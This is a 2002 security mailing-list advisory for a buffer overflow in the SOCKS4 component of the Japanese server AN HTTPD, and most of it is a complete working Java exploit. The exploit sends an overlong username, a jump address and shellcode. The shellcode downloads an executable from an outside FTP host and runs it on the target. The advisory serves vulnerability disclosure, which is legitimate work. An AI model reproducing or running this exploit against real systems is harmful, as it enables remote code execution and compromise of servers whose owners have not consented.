[NT] AN HTTPD SOCKS4 Username Buffer Overflow Vulnerability

From: support@securiteam.com
Date: 10/21/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 21 Oct 2002 18:30:11 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  AN HTTPD SOCKS4 Username Buffer Overflow Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://www.st.rim.or.jp/~nakata/> AN HTTPD is a Japanese multipurpose
server software. The server also works as a SOCKS4 server. Kanatoko found
an exploitable buffer overflow problem in AN HTTPD Version 1.41c. Sending
a SOCKS4 request with long username cause a buffer overflow. This
vulnerability allows a remote attacker to execute arbitary code on the
target host.

DETAILS

Vulnerable systems:
 * AN HTTPD version 1.30 to 1.41c

Immune systems:
 * AN HTTPD version 1.41d

Exploit:
/*///////////////////////////////////////////////////////////////////////////

 AN HTTPD Version 1.41c SOCKS4 username buffer overflow exploit
  for Japanese Windows 2000 Pro (SP2)

 written by Kanatoko
 http://www.jumperz.net/

///////////////////////////////////////////////////////////////////////////*/

import java.net.*;
import java.io.*;

public class anhttpd141c_exploit
{
private static final int SOCKS_PORT = 1080;

private String targetHost;
//----------------------------------------------------------------------------
public static void main( String[] args )
throws Exception
{
if( args.length != 1 )
{
System.out.println( "Usage: java anhttpd141c_exploit TARGETHOST( or IP )"
);
return;
}
anhttpd141c_exploit instance = new anhttpd141c_exploit( args[ 0 ] );
instance.doIt();
}
//----------------------------------------------------------------------------
public anhttpd141c_exploit( String IN_targetHost )
throws Exception
{
targetHost = IN_targetHost;
}
//----------------------------------------------------------------------------
private void doIt()
throws Exception
{
Socket socket = new Socket( targetHost, SOCKS_PORT );
OutputStream os = socket.getOutputStream();

byte[] socks4_request = {
(byte)0x04, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00,
(byte)0x00, (byte)0x01
};

// egg: download and start installing Netscape4.79 :)
// http://www.jumperz.net/egg_netscape.cpp
byte[] egg = {
(byte)0x55, (byte)0x8B, (byte)0xEC, (byte)0x53, (byte)0xEB, (byte)0x57,
(byte)0x90, (byte)0x90,
(byte)0x90, (byte)0x5B, (byte)0x33, (byte)0xC0, (byte)0x88, (byte)0x63,
(byte)0x01, (byte)0x88,
(byte)0x63, (byte)0x03, (byte)0x83, (byte)0xC3, (byte)0x68, (byte)0x88,
(byte)0x23, (byte)0x88,
(byte)0x63, (byte)0x21, (byte)0x88, (byte)0x63, (byte)0x2E, (byte)0x83,
(byte)0xEB, (byte)0x68,
(byte)0x53, (byte)0x83, (byte)0xC3, (byte)0x02, (byte)0x53, (byte)0xB9,
(byte)0xC2, (byte)0x1B,
(byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x50, (byte)0x83,
(byte)0xC3, (byte)0x02,
(byte)0x53, (byte)0xB9, (byte)0x8B, (byte)0x38, (byte)0x02, (byte)0x78,
(byte)0xFF, (byte)0xD1,
(byte)0x59, (byte)0xB9, (byte)0xB8, (byte)0x0E, (byte)0x01, (byte)0x78,
(byte)0xFF, (byte)0xD1,
(byte)0x83, (byte)0xC3, (byte)0x65, (byte)0x53, (byte)0xB9, (byte)0x4A,
(byte)0x9B, (byte)0x01,
(byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x83, (byte)0xC3, (byte)0x21,
(byte)0x53, (byte)0xB9,
(byte)0x4A, (byte)0x9B, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1,
(byte)0xB8, (byte)0x94,
(byte)0x8F, (byte)0xE6, (byte)0x77, (byte)0xFF, (byte)0xD0, (byte)0xE8,
(byte)0xA7, (byte)0xFF,
(byte)0xFF, (byte)0xFF, (byte)0x77, (byte)0x58, (byte)0x71, (byte)0x58,
(byte)0x62, (byte)0x69,
(byte)0x6E, (byte)0x61, (byte)0x72, (byte)0x79, (byte)0x0A, (byte)0x67,
(byte)0x65, (byte)0x74,
(byte)0x20, (byte)0x2F, (byte)0x70, (byte)0x75, (byte)0x62, (byte)0x2F,
(byte)0x63, (byte)0x6F,
(byte)0x6D, (byte)0x6D, (byte)0x75, (byte)0x6E, (byte)0x69, (byte)0x63,
(byte)0x61, (byte)0x74,
(byte)0x6F, (byte)0x72, (byte)0x2F, (byte)0x65, (byte)0x6E, (byte)0x67,
(byte)0x6C, (byte)0x69,
(byte)0x73, (byte)0x68, (byte)0x2F, (byte)0x34, (byte)0x2E, (byte)0x37,
(byte)0x39, (byte)0x2F,
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77,
(byte)0x73, (byte)0x2F,
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77,
(byte)0x73, (byte)0x39,
(byte)0x35, (byte)0x5F, (byte)0x6F, (byte)0x72, (byte)0x5F, (byte)0x6E,
(byte)0x74, (byte)0x2F,
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x70, (byte)0x6C, (byte)0x65,
(byte)0x74, (byte)0x65,
(byte)0x5F, (byte)0x69, (byte)0x6E, (byte)0x73, (byte)0x74, (byte)0x61,
(byte)0x6C, (byte)0x6C,
(byte)0x2F, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, (byte)0x64,
(byte)0x34, (byte)0x37,
(byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, (byte)0x0A,
(byte)0x71, (byte)0x75,
(byte)0x69, (byte)0x74, (byte)0x58, (byte)0x66, (byte)0x74, (byte)0x70,
(byte)0x2E, (byte)0x65,
(byte)0x78, (byte)0x65, (byte)0x20, (byte)0x2D, (byte)0x73, (byte)0x3A,
(byte)0x71, (byte)0x20,
(byte)0x2D, (byte)0x41, (byte)0x20, (byte)0x66, (byte)0x74, (byte)0x70,
(byte)0x2E, (byte)0x6E,
(byte)0x65, (byte)0x74, (byte)0x73, (byte)0x63, (byte)0x61, (byte)0x70,
(byte)0x65, (byte)0x2E,
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x58, (byte)0x63, (byte)0x63,
(byte)0x33, (byte)0x32,
(byte)0x64, (byte)0x34, (byte)0x37, (byte)0x39, (byte)0x2E, (byte)0x65,
(byte)0x78, (byte)0x65,
(byte)0x58
};

byte[] jmp_esp = {
(byte)0x02, (byte)0x4E, (byte)0x02, (byte)0x78
};

os.write( socks4_request );

//where is memset? :0
for( int i = 0; i < 1020; ++i )
{
os.write( (byte)0x41 );
}

os.write( jmp_esp );
os.write( egg );
os.write( (byte)0x00 );
}
//----------------------------------------------------------------------------
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:anvil@jumperz.net> Kanatoko.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.